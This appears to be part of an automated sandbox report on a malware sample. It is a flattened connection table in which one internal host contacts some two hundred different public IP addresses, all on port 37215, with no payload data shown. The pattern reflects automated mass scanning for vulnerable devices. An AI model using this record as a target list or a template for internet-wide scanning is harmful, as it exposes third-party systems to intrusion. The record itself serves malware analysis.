                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24943192.168.2.1546280138.73.249.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24944192.168.2.1556078156.237.133.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24945192.168.2.1550830157.201.171.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24946192.168.2.155419046.94.95.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24947192.168.2.1548012138.50.169.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24948192.168.2.1547460123.99.144.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24949192.168.2.1552576197.114.106.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24950192.168.2.1544038122.175.138.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24951192.168.2.1554422157.68.42.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24952192.168.2.1535468121.112.211.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24953192.168.2.1559716138.56.231.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24954192.168.2.1551150156.50.121.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24955192.168.2.1549388154.11.1.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24956192.168.2.1533610190.31.21.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24957192.168.2.155691431.214.65.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24958192.168.2.154239631.12.52.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24959192.168.2.1537038222.243.54.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24960192.168.2.1553118222.116.135.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24961192.168.2.1542988186.87.89.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24962192.168.2.1545702157.157.23.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24963192.168.2.1552738197.97.49.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24964192.168.2.1559798156.225.220.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24965192.168.2.155149837.58.58.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24966192.168.2.1558362102.82.89.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24967192.168.2.1560304156.5.185.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24968192.168.2.1556974181.105.162.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24969192.168.2.1540208125.15.159.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24970192.168.2.1539088121.105.48.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24971192.168.2.15364861.51.22.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24972192.168.2.154724845.43.114.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24973192.168.2.1542646186.119.130.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24974192.168.2.1558038181.125.166.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24975192.168.2.1536788157.42.40.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24976192.168.2.154356237.161.103.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24977192.168.2.153826437.22.64.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24978192.168.2.1554376138.47.194.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24979192.168.2.1558646157.86.174.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24980192.168.2.155429831.168.1.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24981192.168.2.1558314121.17.253.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24982192.168.2.1548040186.47.246.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24983192.168.2.154500494.149.150.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24984192.168.2.1557010197.72.77.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24985192.168.2.1534828102.147.119.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24986192.168.2.1550788122.134.15.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24987192.168.2.1552544138.240.187.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24988192.168.2.1533624138.103.49.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24989192.168.2.1538564197.34.76.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24990192.168.2.1550622222.172.209.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24991192.168.2.155119294.127.133.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24992192.168.2.153543237.195.45.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24993192.168.2.155664845.31.92.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24994192.168.2.1538562138.59.217.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24995192.168.2.1557640222.186.190.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24996192.168.2.153376894.183.52.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24997192.168.2.1539324190.121.225.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24998192.168.2.155062812.158.26.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24999192.168.2.154713841.54.25.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25000192.168.2.1559556102.227.201.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25001192.168.2.1538112121.247.147.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25002192.168.2.1532904157.252.73.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25003192.168.2.156056841.178.63.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25004192.168.2.155361294.191.104.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25005192.168.2.1560390102.137.178.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25006192.168.2.154290041.29.175.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25007192.168.2.153503445.244.241.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25008192.168.2.1554894181.193.111.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25009192.168.2.1556822156.6.124.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25010192.168.2.155269094.80.18.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25011192.168.2.1537826186.112.116.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25012192.168.2.1540244197.144.215.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25013192.168.2.1540206102.120.71.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25014192.168.2.1538830157.126.137.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25015192.168.2.1540196157.117.252.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25016192.168.2.1546558197.121.213.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25017192.168.2.1549088121.93.181.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25018192.168.2.1554976157.42.175.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25019192.168.2.1533304222.85.99.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25020192.168.2.1544708222.211.12.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25021192.168.2.1556564122.235.9.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25022192.168.2.1535002102.179.210.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25023192.168.2.1558930197.236.210.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25024192.168.2.1554476197.140.187.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25025192.168.2.1540490157.32.227.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25026192.168.2.1560300186.198.155.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25027192.168.2.1536312122.83.223.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25028192.168.2.1551864121.39.53.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25029192.168.2.1552536161.114.108.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25030192.168.2.1559694197.191.21.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25031192.168.2.1558280157.25.29.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25032192.168.2.1544052157.239.223.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25033192.168.2.1535300181.85.27.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25034192.168.2.1533774156.147.74.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25035192.168.2.153683041.123.184.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25036192.168.2.1551096197.91.124.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25037192.168.2.1546162157.165.35.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25038192.168.2.1546886175.224.187.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25039192.168.2.1554140156.193.231.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25040192.168.2.154971437.223.64.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25041192.168.2.1552870190.194.74.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25042192.168.2.155020845.220.62.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25043192.168.2.1544952148.234.35.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25044192.168.2.1533468197.227.182.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25045192.168.2.1549038222.232.111.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25046192.168.2.1545136190.197.178.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25047192.168.2.1553196210.153.172.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25048192.168.2.1553148178.2.158.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25049192.168.2.1533364102.71.1.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25050192.168.2.1549802121.61.118.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25051192.168.2.153606637.142.95.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25052192.168.2.1555426122.90.44.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25053192.168.2.155249445.41.156.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25054192.168.2.1543492190.114.51.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25055192.168.2.155611841.139.151.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25056192.168.2.155258237.92.239.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25057192.168.2.1549452122.19.37.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25058192.168.2.1543942208.170.118.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25059192.168.2.1543188121.237.42.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25060192.168.2.1553302122.52.107.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25061192.168.2.1551970181.251.69.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25062192.168.2.154604637.141.112.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25063192.168.2.1552380222.185.110.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25064192.168.2.153290837.194.239.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25065192.168.2.1533016186.144.233.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25066192.168.2.1550878197.79.115.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25067192.168.2.1541984102.177.16.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25068192.168.2.1551120222.42.244.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25069192.168.2.1555284186.161.227.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25070192.168.2.1546012184.227.124.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25071192.168.2.1544456121.151.40.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25072192.168.2.1552098156.230.157.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25073192.168.2.1554558181.214.14.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25074192.168.2.1559598186.236.88.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25075192.168.2.154546831.136.184.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25076192.168.2.1549072157.255.239.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25077192.168.2.1541250121.11.198.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25078192.168.2.1554436122.39.191.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25079192.168.2.155093031.146.32.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25080192.168.2.1537908197.163.222.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25081192.168.2.1533930222.146.29.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25082192.168.2.1541020121.71.8.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25083192.168.2.1533272121.15.85.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25084192.168.2.154818641.209.40.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25085192.168.2.1553546102.228.140.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25086192.168.2.1533434121.122.229.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25087192.168.2.1560462186.239.154.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25088192.168.2.1551528181.11.193.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25089192.168.2.1552804154.202.94.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25090192.168.2.1537326156.31.235.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25091192.168.2.1544470197.109.134.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25092192.168.2.1542386132.239.208.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25093192.168.2.1556570102.85.2.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25094192.168.2.1546990156.25.9.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25095192.168.2.1535044157.69.69.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25096192.168.2.1533082181.237.27.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25097192.168.2.1537622157.248.55.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25098192.168.2.1543438197.186.73.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25099192.168.2.1549084138.235.242.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25100192.168.2.1534384157.152.230.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25101192.168.2.1544144121.118.83.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25102192.168.2.1550314122.129.174.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25103192.168.2.155546445.29.12.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25104192.168.2.1551010157.213.50.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25105192.168.2.154935641.174.11.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25106192.168.2.1552850197.252.180.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25107192.168.2.1550168156.211.105.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25108192.168.2.153680637.67.130.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25109192.168.2.1556642197.40.25.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25110192.168.2.1548916138.59.216.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25111192.168.2.155704845.21.154.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25112192.168.2.155091445.33.193.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25113192.168.2.154929694.4.147.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25114192.168.2.153560245.50.154.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25115192.168.2.153993694.180.100.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25116192.168.2.1560778138.48.42.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25117192.168.2.1535034190.168.72.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25118192.168.2.1559586197.39.219.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25119192.168.2.1533118190.170.241.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25120192.168.2.1552158190.169.130.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25121192.168.2.1549576102.71.251.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25122192.168.2.1551710222.143.25.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25123192.168.2.1556824186.16.130.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25124192.168.2.1540374190.38.90.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25125192.168.2.1550180157.104.160.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25126192.168.2.1541336181.104.184.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25127192.168.2.155444245.78.48.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25128192.168.2.1546414156.207.137.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25129192.168.2.1535620222.154.213.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25130192.168.2.1540218186.102.87.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25131192.168.2.154558431.224.104.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25132192.168.2.1558546222.101.117.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25133192.168.2.1533408197.58.225.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25134192.168.2.155742031.75.247.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25135192.168.2.1546116122.164.212.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25136192.168.2.155544645.94.57.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25137192.168.2.1543502197.211.119.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25138192.168.2.154644037.56.178.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25139192.168.2.1558538138.17.123.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25140192.168.2.153330894.64.116.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25141192.168.2.154673845.58.84.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25142192.168.2.1552126102.38.207.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25143192.168.2.1557614203.123.243.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25144192.168.2.1552610122.202.84.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25145192.168.2.1544044102.177.229.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25146192.168.2.1543718121.153.74.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25147192.168.2.1556020197.7.109.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25148192.168.2.1536276181.186.58.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25149192.168.2.1536128156.6.118.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25150192.168.2.1534458102.71.232.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25151192.168.2.1536944197.77.36.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25152192.168.2.1540096156.195.98.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25153192.168.2.1551664102.223.92.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25154192.168.2.1550174190.229.97.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25155192.168.2.1536450102.38.143.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25156192.168.2.154725494.117.14.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25157192.168.2.1539892157.70.50.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25158192.168.2.154130094.147.223.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25159192.168.2.153647837.58.115.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25160192.168.2.1551946121.180.114.3037215
